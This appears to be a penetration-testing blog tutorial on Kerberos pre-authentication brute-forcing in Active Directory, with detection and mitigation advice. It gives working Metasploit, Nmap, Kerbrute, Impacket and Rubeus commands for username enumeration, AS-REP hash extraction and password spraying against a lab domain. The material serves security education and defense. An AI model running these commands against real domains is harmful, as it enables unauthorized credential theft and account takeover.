In this post, we explore the exploitation technique known as the Kerberos pre-authentication brute-force attack. This attack takes advantage of Kerberos authentication responses to determine valid usernames and perform password bruteforcing.
The post outlines exploitation methods, and mitigation
techniques, mapped to the MITRE ATT&CK framework for clarity. Detection
mechanisms and actionable recommendations are also provided to help security
professionals identify and defend against this prevalent threat.
Table of
Contents
·
Pre-auth Bruteforce
·
Metasploit
·
Nmap
·
Kerbrute
·
Rubeus
Detection & Mitigation
Kerberos
Authentication
Kerberos is a widely used authentication protocol in Active
Directory (AD) environments. It enables secure authentication using tickets
instead of transmitting passwords in plaintext. The protocol consists of three
key components:
Key Distribution Center (KDC) – Located on the Domain
Controller (DC), responsible for issuing tickets.
Authentication Server (AS) – Handles initial
authentication requests.
Ticket Granting Server (TGS) – Issues service tickets
for access to specific resources.
The authentication process follows these steps:
- A
user requests authentication from the AS by sending an encrypted timestamp
with their password.
- If
valid, the AS returns a Ticket Granting Ticket (TGT).
- The
user presents the TGT to the TGS when accessing resources.
- The
TGS issues a Service Ticket, allowing access to the requested
service.
Despite its security features, Kerberos can be exploited
using brute-force techniques to obtain credentials and access sensitive
information.
Brute-forcing Kerberos is possible due to distinct server
responses during authentication attempts. Attackers exploit these responses to
enumerate valid usernames and crack passwords. Since Kerberos operates on port
88, attackers specifically target this port when performing brute-force
attacks.
Username
Enumeration via AS-REQ Responses
When a TGT request is made via an AS-REQ message, the
Kerberos server responds in different ways:
·
Invalid Username: The server returns KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN,
indicating that the username does not exist.
·
Valid Username without Pre-Authentication:
The server may issue a TGT immediately in a AS-REP response, leading to AS-REP Roasting
attack.
·
Valid Username with Pre-Authentication
Required: The server returns KRB5KDC_ERR_PREAUTH_REQUIRED,
indicating that the client must provide additional authentication data.
Metasploit
The auxiliary/scanner/kerberos/kerberos_login module
can verify Kerberos credentials against a range of machines and report
successful logins.
This module can identify the following information from the
KDC:
·
Valid/Invalid accounts
·
Locked/Disabled accounts
·
Accounts with expired passwords, when the
password matches
·
AS-REP Roastable accounts
USER_FILE option is used to specify the file
containing a list of user names to query the Domain Controller to identify if
they exist in the target domain or not.
use auxiliary/scanner/kerberos/kerberos_login
set rhosts 192.168.1.48
set domain ignite.local
set user_file users.txt
run
The gather/kerberos_enumusers module uses a custom
wordlist to query a single Domain Controller and identify valid domain user
accounts.
use auxiliary/gather/kerberos_enumusers
set rhosts 192.168.1.48
set domain ignite.local
set user_file users.txt
run
Nmap
Nmap krb5-enum-users script Discovers valid usernames by
brute force querying likely usernames against a Kerberos service.
krb5-enum-users.realm: this argument is required as
it supplies the script with the Kerberos REALM against which to guess the user
names.
nmap -p 88 --script krb5-enum-users --script-args
krb5-enum-users.realm='ignite.local',userdb=users.txt 192.168.1.48
Kerbrute
Kerbrute
is a tool used to enumerate valid Active directory user accounts that use
Kerberos pre-authentication.
./kerbrute_linux_amd64 userenum --dc 192.168.1.48 -d
ignite.local users.txt
Impacket
Impacket’s GetNPUsers script helps enumerate valid usernames
and extract AS-REP hashes for offline cracking.
Impacket-GetNPUsers -dc-ip 192.168.1.48 ignite.local/
-userfile users.txt
Windows
Rubeus
The brute option in Rubeus can be used to perform a
password bruteforce attack against all the existing user accounts in Active
Directory. Many times, the same password is used with multiple accounts in
real-life enterprise infrastructure. So, brute option can generate multiple TGTs
in those accounts having the same password.
.\Rubeus.exe brute /passwords:password.txt
/dc.ignite.local /outfile:ignite.txt
Above command will produce the output in ignite.txt file.
Type .\ignite.txt
Kerberos is a powerful authentication protocol, but it can
be exploited if misconfigured. By understanding the different brute-force
techniques and using tools like Kerbrute, Impacket, Rubeus, and Metasploit,
attackers can attempt to extract credentials. However, organizations can
protect themselves by enforcing security best practices, monitoring logs, and
implementing strict access controls.
Detection
& Mitigation
Detection Techniques:
- Monitor
Event Logs:
- Event
ID 4768 (TGT requests)
- Event
ID 4769 (TGS requests)
- Event
ID 4771 (Failed Kerberos pre-authentication attempts)
- Look
for High-Frequency Requests:
- Multiple
failed authentication attempts from the same IP.
- Multiple
service ticket requests within a short period.
Mitigation Strategies:
- Enforce
Pre-Authentication: Prevent AS-REP attacks by requiring all users to
authenticate before receiving a TGT.
- Enforce
Strong Password Policies: Use complex passwords to resist brute-force
attempts.
- Monitor
for Anomalous Behavior: Detect brute-force attempts using SIEM tools.
- Use
Account Lockout Policies: Limit failed login attempts to prevent password
spraying.
- Limit
Service Accounts with SPNs: Reduce exposure to Kerberoasting by
restricting unnecessary SPN assignments.
0 comments:
Post a Comment